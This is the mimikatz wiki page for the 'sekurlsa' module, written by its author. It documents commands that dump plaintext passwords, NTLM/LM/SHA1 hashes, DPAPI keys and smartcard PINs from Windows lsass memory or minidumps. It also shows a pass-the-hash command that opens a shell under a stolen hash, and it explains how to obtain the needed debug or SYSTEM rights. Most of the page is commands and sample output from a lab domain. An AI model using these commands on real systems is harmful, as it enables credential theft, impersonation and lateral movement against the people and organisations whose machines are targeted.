Skip to content

module ~ sekurlsa

Benjamin DELPY edited this page Apr 26, 2014 · 43 revisions

This module extracts passwords, keys, pin codes, tickets from the memory of lsass (Local Security Authority Subsystem Service)
the process by default, or a minidump of it! (see: howto ~ get passwords by memory dump for minidump or other dumps instructions)

When working with lsass process, mimikatz needs some rights, choice:

  • Administrator, to get debug privilege via privilege::debug
  • SYSTEM account, via post exploitation tools, scheduled tasks, psexec -s ... - in this case debug privilege is not needed.

Without rights to access lsass process, all commands will fail with an error like this: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump).

So, do not hesitate to start with:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # log sekurlsa.log
Using 'sekurlsa.log' for logfile : OK

...before others commands 😉

The information that can be extracted depends on the version of Windows and authentication methods: [en] http://1drv.ms/1fCWkhu

Commands: logonpasswords, pth, tickets, dpapi, minidump, process, searchpasswords, msv, wdigest, kerberos, tspkg, livessp, ssp, credman

logonpasswords

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 88038 (00000000:000157e6)
Session           : Interactive from 1
User Name         : Gentil Kiwi
Domain            : vm-w7-ult
SID               : S-1-5-21-2044528444-627255920-3055224092-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        wdigest :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        kerberos :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        ssp :
         [00000000]
         * Username : admin
         * Domain   : nas
         * Password : anotherpassword
        credman :
         [00000000]
         * Username : nas\admin
         * Domain   : nas.chocolate.local
         * Password : anotherpassword

pth

Pass-The-Hash

mimikatz can perform

Arguments:

  • /user - the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account.
  • /domain - the domain name - without domain or in case of local user/admin, use computer or server name, workgroup or whatever.
  • /ntlm - the NTLM hash of the user.
  • /run - optional - the command line to run - default is: cmd to have a shell.
mimikatz # sekurlsa::pth /user:utilisateur /domain:chocolate /ntlm:8e3a18d453ec2450c321003772d678d5 /run:"cmd /k dir \\win81.chocolate.local\test\flag.txt"
user    : utilisateur
domain  : chocolate
NTLM    : 8e3a18d453ec2450c321003772d678d5
Program : cmd /k dir \\win81.chocolate.local\test\flag.txt
  |  PID  1828
  |  TID  856
  |  LUID 0 ; 3201168 (00000000:0030d890)
  \_ Data copy @ 00000000004A6300 : OK !

See also:

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 88038 (00000000:000157e6)
Session           : Interactive from 1
User Name         : Gentil Kiwi
Domain            : vm-w7-ult
SID               : S-1-5-21-2044528444-627255920-3055224092-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
...

Remark:

Dump from Works on
NT 5 - x86 NT 5 - x86
NT 5 - x64 NT 5 - x64
NT 6 - x86 NT 6 - x86/x64 (mimikatz x86)
NT 6 - x64 NT 6 - x64

Some errors:

  • ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (A) != MIMIKATZ_NT_MAJOR_VERSION (B)
    You try to open minidump from a Windows NT of another major version (NT5 vs NT6).
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (A) != PROCESSOR_ARCHITECTURE_xxx (B)
    You try to open minidump from a Windows NT of another architecture (x86 vs x64).
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
    The minidump file is not found (check path).

process

searchpasswords

msv

Authentication Id : 0 ; 3518063 (00000000:0035ae6f)
Session           : Unlock from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500
        msv :
         [00010000] CredentialKeys
         * RootKey  : 2a099891174e2d700d44368255a53a1a0e360471343c1ad580d57989bba09a14
         * DPAPI    : 43d7b788389b67ee3bcac1786f01a75f

Authentication Id : 0 ; 3463053 (00000000:0034d78d)
Session           : Interactive from 2
User Name         : utilisateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-1107
        msv :
         [00010000] CredentialKeys
         * NTLM     : 8e3a18d453ec2450c321003772d678d5
         * SHA1     : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
         [00000003] Primary
         * Username : utilisateur
         * Domain   : CHOCOLATE
         * LM       : 00000000000000000000000000000000
         * NTLM     : 8e3a18d453ec2450c321003772d678d5
         * SHA1     : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa

wdigest

kerberos

When using smartcard logon on the domain, lsass caches PIN code of the smartcard

mimikatz # sekurlsa::kerberos
[...]
        kerberos :
         * Username : Administrateur
         * Domain   : CHOCOLATE.LOCAL
         * Password : (null)
         * PIN code : 1234

tspkg

livessp

ssp

credman